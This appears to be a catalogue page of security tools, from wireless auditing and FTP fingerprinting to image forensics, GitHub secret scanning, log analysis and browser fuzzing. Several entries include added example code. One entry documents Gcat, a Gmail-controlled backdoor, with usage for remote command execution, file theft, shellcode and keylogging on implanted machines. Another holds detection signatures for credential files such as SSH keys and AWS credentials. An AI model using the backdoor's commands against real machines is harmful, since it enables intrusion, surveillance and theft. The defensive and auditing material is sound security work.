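    h1, h2 = sha256_hex(original), sha256_hex(candidate)
    crypto_bits = hamming(int(h1, 16), int(h2, 16))
    dist = hamming(average_hash(original), average_hash(candidate))
    return (h1 == h2, crypto_bits, dist, dist <= max_distance)


if __name__ == "__main__":
    orig = make_test_image()
    same, crypto_bits, dist, similar = compare(orig, manipulate(orig))
    print("sha256 identical:", same, "| differing sha256 bits:", crypto_bits, "of 256")
    print("aHash distance:", dist, "of 64 | judged similar:", similar)
```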

Download Forpix
FRUITYWIFI V2.2 - WIRELESS NETWORK AUDITING TOOL

FruityWifi is an open source tool to audit wireless networks. It allows the user to deploy advanced attacks by directly using the web interface or by sending messages to it.
Initially the application was created to be used with the Raspberry Pi, but it can be installed on any Debian based system.
FruityWifi v2.0 has many upgrades: a new interface, new modules, Realtek chipset support, Mobile Broadband (3G/4G) support, a new control panel, and more.

A more flexible control panel. Now it is possible to use FruityWifi combining multiple networks and setups:

- Ethernet <-> Ethernet,
- Ethernet <-> 3G/4G,
- Ethernet <-> Wifi,
- Wifi <-> Wifi,
- Wifi <-> 3G/4G, etc.

Within the new options on the control panel we can change the AP mode between Hostapd and Airmon-ng, allowing the use of more chipsets like Realtek.
It is possible to customize each one of the network interfaces, which allows the user to keep the current setup or change it completely.
Changelog

v2.2
Wireless service has been replaced by AP module
Mobile support has been added
Bootstrap support has been added
Token auth has been added
minor fix

v2.1
Hostapd Mana support has been added
Phishing service has been replaced by phishing module
Karma service has been replaced by karma module
Sudo has been implemented (replacement for danger)
Logs path can be changed
Squid dependencies have been removed from FruityWifi installer
Phishing dependencies have been removed from FruityWifi installer
New AP options available: hostapd, hostapd-mana, hostapd-karma, airmon-ng
Domain name can be changed from config panel
New install options have been added to installFruityWifi.sh
Install/Remove have been updated

Download FruityWifi
FTPMAP - FTP SCANNER IN C

Ftpmap scans remote FTP servers to identify what software and what versions they are running. It uses program-specific fingerprints to discover the name of the software even when banners have been changed or removed, or when some features have been disabled. Ftpmap can also detect known vulnerabilities from the FTP software/version.

COMPILATION
./configure
make
make install

Using ftpmap is trivial, and the built-in help is self-explanatory.

Examples:
ftpmap -s ftp.c9x.org
ftpmap -P 2121 -s 127.0.0.1
ftpmap -u joe -p joepass -s ftp3.c9x.org

If a named host has several IP addresses, they are all sequentially scanned. During the scan, ftpmap displays a list of numbers: this is the "fingerprint" of the server.
Another indication that can be displayed if login was successful is the FTP PORT sequence prediction. If the difficulty is too low, it means that anyone can steal your files and change their content, even without knowing your password or sniffing your network.
There are very few known fingerprints yet, but submissions are welcome.
Obfuscating FTP servers

This software was written as a proof of concept that security through obscurity doesn't work. Many system administrators think that hiding or changing banners and messages in their server software can improve security.
Don't trust this. Script kiddies just ignore banners. If they read that "XYZ FTP software has a vulnerability", they will try the exploit on all FTP servers they find, whatever software they are running. The same goes for free and commercial vulnerability scanners. They probe exploits to find potential holes, and they just discard banners and messages.
On the other hand, removing the software name and version is confusing for the system administrator, who has no way to quickly check what's installed on his servers.
If you want to sleep quietly, the best thing to do is to keep your systems up to date: subscribe to mailing lists and apply vendor patches.
Downloading Ftpmap
git clone git://github.com/Hypsurus/ftpmap

Download FTPMap
GCAT - A STEALTHY BACKDOOR THAT USES GMAIL AS
A COMMAND AND CONTROL SERVER

A stealthy Python based backdoor that uses Gmail as a command and control server.
Setup

For this to work you need:
A Gmail account (Use a dedicated account! Do not use your personal one!)
Turn on "Allow less secure apps" under the security settings of the account
This repo contains two files:
gcat.py a script that's used to enumerate and issue commands to available clients
implant.py the actual backdoor to deploy
In both files, edit the gmail_user and gmail_pwd variables with the username and password of the account you previously set up.
You're probably going to want to compile implant.py into an executable using Pyinstaller.

Usage
Gcat
optional arguments:
-h, --help            show this help message and exit
-v, --version         show program's version number and exit
-id ID                Client to target
-jobid JOBID          Job id to retrieve
-list                 List available clients
-info                 Retrieve info on specified client

Commands:
Commands to execute on an implant
-cmd CMD              Execute a system command
-download PATH        Download a file from a clients system
-exec-shellcode FILE  Execute supplied shellcode on a client
-screenshot           Take a screenshot
-lock-screen          Lock the clients screen
-force-checkin        Force a check in
-start-keylogger      Start keylogger
-stop-keylogger       Stop keylogger

Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:

#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600SP3-x86

The output is a UUID string that uniquely identifies the system and the OS the implant is running on.
Let's issue a command to an implant:

#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv

Here we are telling 90b2cd83-cb36-52de-84ee-99db6ff41a11 to execute ipconfig /all; the script then outputs the jobid that we can use to retrieve the output of that command.
Let's get the results!

#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'

Windows IP Configuration
Host Name . . . . . . . . . . . . : unknown-2d44b52
Primary Dns Suffix  . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No

-- SNIP --

That's the gist of it! But you can do much more, as you can see from the usage of the script! ;)

Download Gcat
GEOTWEET - SOCIAL ENGINEERING TOOL FOR HUMAN HACKING

Another way to use Twitter and Instagram. Geotweet is an OSINT application that allows you to track tweets and Instagram posts, trace their geographical locations and then export them to Google Maps.

It allows you to search by tags, world zones and user (info and timeline).
Requirements

Python 2.7
PyQt4, tweepy, geopy, ca_certs_locater, python-instagram
Works on Linux, Windows, Mac OS X, BSD

Installation
git clone https://github.com/Pinperepette/Geotweet_GUI.git
cd Geotweet_GUI
chmod +x Geotweet.py
sudo apt-get install python-pip
sudo pip install tweepy
sudo pip install geopy
sudo pip install ca_certs_locater
sudo pip install python-instagram
python ./Geotweet.py

Download Geotweet
GETHEAD - HTTP HEADER ANALYSIS VULNERABILITY TOOL

gethead.py is a Python HTTP Header Analysis Vulnerability Tool. It identifies security vulnerabilities and the lack of protection in HTTP headers.
Usage:
$ python gethead.py http://domain.com

Changelog

Version 0.1 - Initial Release
Written in Python 2.7.5
Performs HTTP Header Analysis
Reports Header Vulnerabilities

Features in Development

Version 0.2 - Next Release (April 2014 Release)
Support for git updates
Support for Python 3.3
Complete Header Analysis
Additional Logic for Severity Classifications
Rank Vulnerabilities by Severity
Export Findings with Description, Impact, Execution, Fix, and References
Export with multi-format options (XML, HTML, TXT)

Version 0.3 - Future Release (May 2014 Release)
Replay and Inline Upstream Proxy support to import into other tools
Scan domains, sub-domains, and multi-services
Header Injection and Fuzzing functionality
HTTP Header Policy Bypassing
Modularize and port to more platforms (e.g. gMinor, Kali, Burp Extension, Metasploit, Chrome, Firefox)

Download GetHead
GHIRO 0.2 - AUTOMATED DIGITAL IMAGE FORENSICS TOOL

Sometimes forensic investigators need to process digital images as evidence. Some tools exist for this, but a forensic analysis that involves a lot of images is otherwise difficult to handle.
Images contain a great deal of information; Ghiro extracts it from the provided images and displays it in a nicely formatted report.
Dealing with tons of images is pretty easy: Ghiro is designed to scale to gigabytes of images.
All tasks are fully automated; you just have to upload your images and let Ghiro do the work.
Understandable reports and strong search capabilities let you find a needle in a haystack.
Ghiro is a multi-user environment, and different permissions can be assigned to each user. Cases let you group image analyses by topic, and a permission schema lets you choose which users are allowed to see your case.
Use Cases

Ghiro can be used in many scenarios. Forensic investigators could use it on a daily basis in their analysis lab, but anyone interested in uncovering secrets hidden in images could benefit. Some example use cases:
If you need to extract all data and metadata hidden in an image in a fully automated way
If you need to analyze a lot of images and do not have much time to read the report for all of them
If you need to search a bunch of images for some metadata
If you need to geolocate a bunch of images and see them on a map
If you have a hash list of "special" images and you want to search for them
Ghiro is designed to be used in many other scenarios as well; imagination is the only limit.
MAIN FEATURES

Metadata extraction
Metadata are divided into several categories depending on the standard they come from. Image metadata are extracted and categorized, for example: EXIF, IPTC, XMP.
GPS Localization
Sometimes the image metadata embed a geotag, a bit of GPS data providing the longitude and latitude of where the photo was taken. It is read and the position is displayed on a map.
MIME information
The image MIME type is detected so you know the image type you are dealing with, in both compact (example: image/jpeg) and extended form.
Error Level Analysis
Error Level Analysis (ELA) identifies areas within an image that are at different compression levels. The entire picture should be at roughly the same level; if a difference is detected, it likely indicates a digital modification.
Thumbnail extraction
The thumbnails and the data related to them are extracted from image metadata and stored for review.
Thumbnail consistency
Sometimes when a photo is edited, the original image is changed but the thumbnail is not. Differences between the thumbnails and the images are detected.
Signature engine
Over 120 signatures provide evidence about the most critical data to highlight focal points and common exposures.
Hash matching
Suppose you are searching for an image and you have only its hash. You can provide a list of hashes and all matching images are reported.
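As an added example (not Ghiro's own code), the following Python reads the EXIF block that the metadata, GPS and thumbnail features above all start from: it walks the JPEG segment list, locates the APP1 "Exif" segment, parses the TIFF header and the first IFD, and returns the camera, software and timestamp tags plus whether a GPS sub-IFD is present. The JPEG it runs on is constructed inline, so the tag values (ExampleCam, Model-X, Editor 9.0 and the timestamp) are sample data rather than a real photograph.

```python
# Minimal EXIF (IFD0) reader for JPEG files. Added example, not Ghiro's code:
# it walks the JPEG segments, finds the APP1 "Exif" segment, parses the TIFF
# header and the first IFD, and returns the ASCII tags plus GPS presence.
import struct

# Tag numbers from the TIFF/EXIF specification (subset).
TAG_NAMES = {
    0x010F: "Make", 0x0110: "Model", 0x0131: "Software", 0x0132: "DateTime",
    0x8769: "ExifIFDPointer", 0x8825: "GPSInfoIFDPointer",
}
# Byte size of each TIFF field type: BYTE, ASCII, SHORT, LONG, RATIONAL, UNDEFINED, SLONG, SRATIONAL
TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 7: 1, 9: 4, 10: 8}


def find_app1_exif(jpeg: bytes) -> bytes:
    """Return the TIFF blob inside the APP1 Exif segment, or b"" if there is none."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 4 <= len(jpeg):
        if jpeg[pos] != 0xFF:
            raise ValueError("corrupt segment list at offset %d" % pos)
        marker = jpeg[pos + 1]
        if marker == 0xDA:  # SOS: entropy-coded image data follows, no more metadata
            break
        (length,) = struct.unpack(">H", jpeg[pos + 2:pos + 4])  # counts the 2 length bytes
        payload = jpeg[pos + 4:pos + 2 + length]
        if marker == 0xE1 and payload.startswith(b"Exif\x00\x00"):
            return payload[6:]
        pos += 2 + length
    return b""


def parse_ifd0(tiff: bytes) -> dict:
    """Parse the TIFF header and IFD0 into a {tag name: value} dict."""
    byte_order = {b"II": "<", b"MM": ">"}.get(tiff[:2])
    if byte_order is None:
        raise ValueError("bad TIFF byte-order mark")
    magic, ifd_offset = struct.unpack(byte_order + "HI", tiff[2:8])
    if magic != 42:
        raise ValueError("bad TIFF magic number")
    (count,) = struct.unpack(byte_order + "H", tiff[ifd_offset:ifd_offset + 2])
    tags = {}
    for i in range(count):
        start = ifd_offset + 2 + 12 * i
        tag, ftype, n, field = struct.unpack(byte_order + "HHI4s", tiff[start:start + 12])
        size = TYPE_SIZES.get(ftype, 1) * n
        if size <= 4:
            raw = field[:size]  # short values are stored inline, left-justified
        else:
            (offset,) = struct.unpack(byte_order + "I", field)
            raw = tiff[offset:offset + size]
        if ftype == 2:  # ASCII, NUL-terminated
            value = raw.split(b"\x00", 1)[0].decode("ascii", "replace")
        elif ftype == 4 and n == 1:  # LONG, e.g. a sub-IFD pointer
            (value,) = struct.unpack(byte_order + "I", raw)
        else:
            value = raw
        tags[TAG_NAMES.get(tag, "Tag_%04X" % tag)] = value
    return tags


def exif_summary(jpeg: bytes) -> dict:
    """Forensic-relevant EXIF facts: who made the image, what edited it, when, and whether it is geotagged."""
    tiff = find_app1_exif(jpeg)
    if not tiff:
        return {"has_exif": False}
    tags = parse_ifd0(tiff)
    return {"has_exif": True, "make": tags.get("Make"), "model": tags.get("Model"),
            "software": tags.get("Software"), "datetime": tags.get("DateTime"),
            "has_gps": "GPSInfoIFDPointer" in tags}


def build_sample_jpeg() -> bytes:
    """Construct a tiny JPEG with a little-endian EXIF block (sample values, not a real photo)."""
    ascii_tags = [(0x010F, b"ExampleCam\x00"), (0x0110, b"Model-X\x00"),
                  (0x0131, b"Editor 9.0\x00"), (0x0132, b"2015:06:09 06:51:44\x00")]
    n = len(ascii_tags) + 1  # plus the GPS sub-IFD pointer entry
    data_start = 8 + 2 + 12 * n + 4  # TIFF header, entry count, entries, next-IFD link
    ifd, data = struct.pack("<H", n), b""
    for tag, value in ascii_tags:  # entries must be sorted by tag number
        ifd += struct.pack("<HHII", tag, 2, len(value), data_start + len(data))
        data += value
    gps_ifd = data_start + len(data)  # an empty GPS sub-IFD follows the string data
    ifd += struct.pack("<HHII", 0x8825, 4, 1, gps_ifd) + struct.pack("<I", 0)
    tiff = b"II*\x00" + struct.pack("<I", 8) + ifd + data + struct.pack("<H", 0)
    app1 = b"Exif\x00\x00" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"
```

The Software tag is the first thing a reviewer checks: an editor name next to an unchanged camera Make/Model is the metadata-side counterpart of the thumbnail-consistency and ELA checks listed above.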

Download Ghiro
GITROB - RECONNAISSANCE TOOL FOR GITHUB ORGANIZATIONS

Gitrob is a command line tool that can help organizations and security professionals find sensitive information that has ended up in public GitHub repositories. The tool will iterate over all public organization and member repositories and match filenames against a range of patterns for files that typically contain sensitive or dangerous information.
How it works

Looking for sensitive information in GitHub repositories is not a new thing; it has been known for a while that things such as private keys and credentials can be found with GitHub's search functionality. Gitrob, however, makes it easier to focus the effort on a specific organization.
The first thing the tool does is collect all public repositories of the organization itself. It then goes on to collect all the organization members and their public repositories, in order to compile a list of repositories that might be related or have relevance to the organization.
When the list of repositories has been compiled, it proceeds to gather all the filenames in each repository and runs them through a series of observers that flag the files if they match any patterns of known sensitive files. This step might take a while if the organization is big or if the members have a lot of public repositories.
All of the members, repositories and files will be saved to a PostgreSQL database. When everything has been sifted through, it will start a Sinatra web server locally on the machine, which will serve a simple web application to present the collected data for analysis.
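The observer step described above, as an added example rather than Gitrob's own code or signature set: each signature names the part of the path it inspects (filename, extension or whole path), how it matches (exact, regex or glob) and a caption for the reviewer. The signatures and the repository file listing are a small constructed sample; the same code runs over any list of paths, such as the output of git ls-files for your own organization's repositories.

```python
# Filename observers in the style Gitrob describes. Added example, not
# Gitrob's code or database; SIGNATURES and SAMPLE_REPO are constructed.
import fnmatch
import os
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class Signature:
    part: str      # which part of the path to inspect: "filename", "extension" or "path"
    match: str     # how to compare it: "exact", "regex" or "glob"
    pattern: str
    caption: str   # what a hit means for the reviewer


SIGNATURES = [
    Signature("filename", "exact", "id_rsa", "Private SSH key"),
    Signature("extension", "exact", ".pem", "Potential cryptographic private key"),
    Signature("filename", "regex", r"^\.?(bash_|zsh_)?history$", "Shell command history file"),
    Signature("filename", "exact", ".env", "Environment file, may contain credentials"),
    Signature("path", "regex", r"(^|/)\.aws/credentials$", "AWS CLI credentials file"),
    Signature("filename", "glob", "*.keystore", "Java keystore"),
    Signature("filename", "regex", r"^\.?netrc$", "netrc file with plaintext credentials"),
]


def _part(path: str, part: str) -> str:
    """Extract the component of a repository path that a signature inspects."""
    filename = path.rsplit("/", 1)[-1]
    if part == "filename":
        return filename
    if part == "extension":
        return os.path.splitext(filename)[1]  # ".env" has no extension here, by design
    return path


def _matches(sig: Signature, subject: str) -> bool:
    if sig.match == "exact":
        return subject == sig.pattern
    if sig.match == "regex":
        return re.search(sig.pattern, subject) is not None
    if sig.match == "glob":
        return fnmatch.fnmatch(subject, sig.pattern)
    raise ValueError("unknown match type: " + sig.match)


def observe(path: str) -> List[str]:
    """Return the captions of every signature that flags this path."""
    return [s.caption for s in SIGNATURES if _matches(s, _part(path, s.part))]


def scan_repository(paths: List[str]) -> Dict[str, List[str]]:
    """Run the observers over a repository's file list; only flagged paths are returned."""
    findings: Dict[str, List[str]] = {}
    for path in paths:
        hits = observe(path)
        if hits:
            findings[path] = hits
    return findings


# Constructed file listing of a sample repository (not from any real project).
SAMPLE_REPO = [
    "README.md", "src/main.py", "id_rsa", "config/.env", "certs/server.pem",
    "home/.aws/credentials", ".bash_history", "app/release.keystore", "docs/history.md",
]
```

Filename signatures are cheap but only catch files whose name gives them away; a hardcoded key inside settings.py needs a content-based signature, which is a separate pass.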

Download Gitrob
GOACCESS - REAL-TIME WEB LOG ANALYZER AND INTERACTIVE VIEWER

GoAccess is an open source real-time web log analyzer and interactive viewer that runs in a terminal on *nix systems. It provides fast and valuable HTTP statistics for system administrators that require a visual server report on the fly.
Features

GoAccess parses the specified web log file and outputs the data to the X terminal.
General statistics, bandwidth, etc.
Time taken to serve the request (useful to track pages that are slowing down your site)
Top visitors
Requested files & static files
404 or Not Found
Hosts, Reverse DNS, IP Location
Operating Systems
Browsers and Spiders
Referring Sites & URLs
Keyphrases
Geo Location - Continent/Country/City
Visitors Time Distribution (new)
HTTP Status Codes
Ability to output JSON and CSV
Different Color Schemes
Support for large datasets + data persistence
Support for IPv6
Output statistics to HTML (see the sample report)
and more...
GoAccess allows any custom log format string. Predefined options include, but are not limited to:
Amazon CloudFront (Download Distribution)
Apache/Nginx Common/Combined + VHosts
W3C format (IIS)
Why GoAccess?

The main idea behind GoAccess is being able to quickly analyze and view web server statistics in real time without having to generate an HTML report. Although it is possible to generate an HTML, JSON or CSV report, by default it outputs to a terminal.
You can see it more as a monitoring command-line tool than anything else.
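An added example, not GoAccess code, of the parsing behind several of the panels listed above: it reads Apache/Nginx combined-format lines, counts (rather than silently drops) lines that do not match, and aggregates hits, bandwidth, status codes, top hosts, requested files and 404s. It also derives one thing the panels leave to the reader: hosts whose 404 count reaches a threshold, a cheap indicator of path probing. The log lines are constructed, with addresses from the documentation ranges; the threshold of 3 is an assumption.

```python
# Combined-log parser and summary. Added example, not GoAccess code; the
# log lines in SAMPLE_LOG are constructed.
import re
from collections import Counter
from typing import Dict, Optional

# Apache/Nginx "combined" format:
# %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: (?P<proto>HTTP/[\d.]+))?" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2015:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2015:13:55:37 +0000] "GET /style.css HTTP/1.1" 200 512 "http://example.com/index.html" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2015:13:55:38 +0000] "GET /logo.png HTTP/1.1" 200 8191 "http://example.com/index.html" "Mozilla/5.0"
198.51.100.23 - - [10/Oct/2015:13:56:01 +0000] "GET /wp-login.php HTTP/1.1" 404 209 "-" "curl/7.35.0"
198.51.100.23 - - [10/Oct/2015:13:56:02 +0000] "GET /admin/ HTTP/1.1" 404 209 "-" "curl/7.35.0"
198.51.100.23 - - [10/Oct/2015:13:56:03 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 209 "-" "curl/7.35.0"
192.0.2.44 - - [10/Oct/2015:13:57:10 +0000] "POST /login HTTP/1.1" 302 - "-" "Mozilla/5.0"
this line is not in combined format and must be counted as unparsed
"""


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format line; return None for lines that do not match."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["bytes"] = 0 if rec["bytes"] == "-" else int(rec["bytes"])  # "-" means no body sent
    return rec


def summarize(log_text: str, scan_threshold: int = 3) -> Dict:
    """Aggregate the figures GoAccess shows in its panels, plus a 'probable
    scanner' list: hosts whose 404 count reaches scan_threshold (assumed value)."""
    hits, unparsed, bandwidth = 0, 0, 0
    status, hosts, files, not_found = Counter(), Counter(), Counter(), Counter()
    not_found_by_host = Counter()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec is None:
            unparsed += 1  # never drop silently: a format change would otherwise hide traffic
            continue
        hits += 1
        bandwidth += rec["bytes"]
        status[rec["status"]] += 1
        hosts[rec["host"]] += 1
        files[rec["path"]] += 1
        if rec["status"] == 404:
            not_found[rec["path"]] += 1
            not_found_by_host[rec["host"]] += 1
    return {
        "hits": hits,
        "unparsed": unparsed,
        "bandwidth": bandwidth,
        "status": dict(status),
        "top_hosts": hosts.most_common(3),
        "requested_files": dict(files),
        "not_found": dict(not_found),
        "probable_scanners": sorted(h for h, n in not_found_by_host.items() if n >= scan_threshold),
    }
```

The 404-per-host view is the one worth keeping an eye on in the live terminal: a single client walking /wp-login.php, /admin/ and /phpmyadmin/ in quick succession stands out long before it shows up in the top-visitors panel.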

Download GoAccess
GPING - PING, BUT WITH A GRAPH

Ping, but with a graph.

Install and run

Created/tested with Python 3.4; it should run on 2.7 (this will require the statistics module though).
pip3 install pinggraph

Tested on Windows and Ubuntu; it should run on OS X as well.
After installation just run:
gping [yourhost]

If you don't give a host, it pings Google.

Why?

My apartment's internet is all 4G, and while it's normally pretty fast it can be a bit flaky. I often found myself running ping -t google.com in a command window to get a rough idea of the network speed, and I thought a graph would be a great way to visualize the data. I still wanted to just use the command line though, so I decided to try and write a cross-platform one that I could use. And here we are.
Code

For a quick hack the code started off really nice, but after I decided pretty colors were a good addition it quickly got rather complicated. Inside pinger.py is a function plot(); this uses a canvas-like object to "draw" things like lines and boxes to the screen. I found on Windows that changing the colors is slow and caused the screen to flicker, so there's a big mess of a function called process_colors to try and optimize that. Don't ask.

Download Gping
GRAUDIT - FIND POTENTIAL SECURITY FLAWS IN SOURCE CODE USING GREP

Graudit is a simple script with signature sets that allows you to find potential security flaws in source code using the GNU utility grep. It's comparable to other static analysis applications like RATS, SWAAT and flaw-finder while keeping the technical requirements to a minimum and being very flexible.
Who should use graudit?
System administrators, developers, auditors, vulnerability researchers and anyone else that cares to know if the application they develop, deploy or otherwise use is secure.
What languages are supported?
ASP
JSP
Perl
PHP
Python
Other (looks for suspicious comments, etc.)

USAGE

Graudit supports several options and tries to follow good shell practices. For a list of the options you can run graudit -h or see below. The simplest way to use graudit is:
graudit /path/to/scan

DEPENDENCIES

Required: bash, grep, sed

The following options are available:
-A  scan ALL files
-c  number of lines of context to display, default is 2
-d  database to use
-h  prints a short help text
-i  case insensitive search
-l  lists databases available
-L  vim friendly lines
-v  prints version number
-x  exclude these files
-z  suppress colors
-Z  high contrast colors

Download Graudit
GRINDER - SYSTEM TO AUTOMATE THE FUZZING OF WEB BROWSERS

Grinder is a system to automate the fuzzing of web browsers and the management of a large number of crashes. Grinder Nodes provide an automated way to fuzz a browser and generate useful crash information (such as call stacks with symbol information, as well as logging information which can be used to generate reproducible test cases at a later stage). A Grinder Server provides a central location to collate crashes and, through a web interface, allows multiple users to log in and manage all the crashes being generated by all of the Grinder Nodes.
System Requirements

A Grinder Node requires a 32/64-bit Windows system and Ruby 2.0 (Ruby 1.9 is also supported but you won't be able to fuzz 64-bit targets).
A Grinder Server requires a web server with MySQL and PHP.
Features

Grinder Server features:

Multi-user web application. Users can log in and manage all crashes reported by the Grinder Nodes. Administrators can create more users and view the login history.
Users can view the status of the Grinder system. The activity of all nodes in the system is shown, including status information such as the average number of testcases being run per minute, the total crashes a node has generated and the last time a node generated a crash.
Users can view all of the crashes in the system and sort them by node, target, fuzzer, type, hash, time or count.
Users can view crash statistics for the fuzzers, including total and unique crashes per fuzzer and the targets each fuzzer is generating crashes on.
Users can hide all duplicate crashes so as to only show unique crashes in the system, in order to easily manage new crashes as they occur.
Users can assign crashes to one another as well as mark a particular crash as interesting, exploitable, uninteresting or unknown.
Users can store written notes for a particular crash (viewable to all other users) to help manage them.
Users can download individual crash log files to help debug and recreate testcases.
Users can create custom filters to exclude uninteresting crashes from the list of crashes.
Users can create custom e-mail alerts to alert them when a new crash comes into the system that matches specific criteria.
Users can change their password and e-mail address on the system as well as view their own login history.

Grinder Node features:
A node can be brought up and begin fuzzing any supported browser via a single command.
A node injects a logging DLL into the target browser process to help the fuzzers perform logging in order to recreate testcases at a later stage.
A node records useful crash information such as call stack, stack dump, code dump and register info, and also includes any available symbol information.
A node can automatically encrypt all crash information with an RSA public key.
A node can automatically report new crashes to a remote Grinder Server.
A node can run largely unattended for a long period of time.
Grinder Screenshots

Download Grinder
GRYFFIN - LARGE SCALE WEB SECURITY SCANNING PLATFORM

Gryffin is a large scale web security scanning platform. It is not yet another scanner. It was written to solve two specific problems with existing scanners: coverage and scale.
Better coverage translates to fewer false negatives. Inherent scalability translates to the capability of scanning, and supporting, a large elastic application infrastructure. Simply put, the ability to go from scanning 1,000 applications today to 100,000 applications tomorrow by straightforward horizontal scaling.

Coverage
Coverage has two dimensions: one during crawl and the other during fuzzing. In the crawl phase, coverage means being able to find as much of the application footprint as possible. In the scan phase, or while fuzzing, it means being able to test each part of the application for an applied set of vulnerabilities in depth.
Crawl Coverage
Today a large number of web applications are template-driven, meaning the same code or path generates millions of URLs. A security scanner needs only one of the millions of URLs generated by the same code or path. Gryffin's crawler does just that.
Page Deduplication
At the heart of Gryffin is a deduplication engine that compares a new page with already seen pages. If the HTML structure of the new page is similar to those already seen, it is classified as a duplicate and not crawled further.
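The structural comparison described above, as an added example that is not Gryffin's code or its html-distance package: the tag skeleton of each page (tag names and attribute names, not text or attribute values) is cut into overlapping 3-grams and fingerprinted with simhash, and a page whose fingerprint lies within a small Hamming distance of an already-seen one is treated as a duplicate. The three pages are constructed; the 3-bit threshold and the 64-bit fingerprint are assumptions of this example, not values taken from Gryffin.

```python
# Structural page deduplication via simhash of the HTML tag skeleton.
# Added example, not Gryffin's code; the pages below are constructed.
import hashlib
from html.parser import HTMLParser
from typing import List


class TagSkeleton(HTMLParser):
    """Record the tag sequence of a document, ignoring text and attribute values."""

    def __init__(self):
        super().__init__()
        self.tags: List[str] = []

    def handle_starttag(self, tag, attrs):
        # Attribute *names* (class, href, id) are part of the template shape;
        # their values differ between pages generated by the same code.
        self.tags.append(tag + "".join(sorted("@" + name for name, _ in attrs)))

    def handle_endtag(self, tag):
        self.tags.append("/" + tag)


def skeleton(html: str) -> List[str]:
    p = TagSkeleton()
    p.feed(html)
    p.close()
    return p.tags


def shingles(tokens: List[str], k: int = 3) -> List[str]:
    """Overlapping k-grams of the tag sequence, so local structure counts, not just tag totals."""
    if len(tokens) < k:
        return [" ".join(tokens)]
    return [" ".join(tokens[i:i + k]) for i in range(len(tokens) - k + 1)]


def simhash(features: List[str], bits: int = 64) -> int:
    """Charikar simhash: similar feature sets yield fingerprints with a small Hamming distance."""
    v = [0] * bits
    for f in features:
        h = int.from_bytes(hashlib.sha256(f.encode()).digest()[:8], "big")
        for i in range(bits):
            v[i] += 1 if (h >> i) & 1 else -1
    return sum(1 << i for i in range(bits) if v[i] > 0)


def hamming(a: int, b: int) -> int:
    return bin(a ^ b).count("1")


class PageDeduplicator:
    """Crawl-side filter: is_duplicate() says whether a page's structure was already seen."""

    def __init__(self, threshold: int = 3):  # threshold is an assumed value
        self.threshold = threshold
        self.seen: List[int] = []

    def is_duplicate(self, html: str) -> bool:
        fp = simhash(shingles(skeleton(html)))
        if any(hamming(fp, s) <= self.threshold for s in self.seen):
            return True
        self.seen.append(fp)
        return False


# Constructed pages: two template-generated product pages and one login page.
PRODUCT_A = """<html><head><title>Widget</title></head><body>
<div class="product" id="p1"><h1>Widget</h1><img src="/img/1.jpg" alt="Widget">
<p class="price">$10</p><a href="/buy/1">Buy</a></div></body></html>"""
PRODUCT_B = """<html><head><title>Gadget</title></head><body>
<div class="product" id="p2"><h1>Gadget</h1><img src="/img/2.jpg" alt="Gadget">
<p class="price">$25</p><a href="/buy/2">Buy</a></div></body></html>"""
LOGIN = """<html><head><title>Login</title><link rel="stylesheet" href="/s.css"></head><body>
<form action="/login" method="post"><label>User</label><input name="u"><label>Password</label>
<input type="password" name="p"><button type="submit">Sign in</button></form>
<table><tr><td>Help</td><td><a href="/help">link</a></td></tr></table></body></html>"""
```

The trade-off to watch is the threshold: too loose and a page with a different form (a genuinely new code path) is skipped, which is exactly the false negative the Coverage section is about; too strict and every product page is crawled and fuzzed.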

DOM Rendering and Navigation
A large number of applications today are rich applications, heavily driven by client-side JavaScript. In order to discover links and code paths in such applications, Gryffin's crawler uses PhantomJS for DOM rendering and navigation.
Scan Coverage
As Gryffin is a scanning platform, not a scanner, it does not have its own fuzzer modules, even for fuzzing common web vulnerabilities like XSS and SQL Injection.
It's not wise to reinvent the wheel where you do not have to. Gryffin at production scale at Yahoo uses open source and custom fuzzers. Some of these custom fuzzers might be open sourced in the future, and might or might not be part of the Gryffin repository.
For demonstration purposes, Gryffin comes integrated with sqlmap and arachni. It does not endorse them or any other scanner in particular.
The philosophy is to improve scan coverage by being able to fuzz for just what you need.

Scale
While Gryffin is available as a standalone package, it's primarily built for scale.
Gryffin is built on the publisher-subscriber model. Each component is either a publisher, or a subscriber, or both. This allows Gryffin to scale horizontally by simply adding more subscriber or publisher nodes.

Operating Gryffin
Pre-requisites

1. Go
2. PhantomJS, v2
3. Sqlmap (for fuzzing SQLi)
4. Arachni (for fuzzing XSS and web vulnerabilities)
5. NSQ,
running lookupd at port 4160,4161
running nsqd at port 4150,4151
with --max-msg-size=5000000
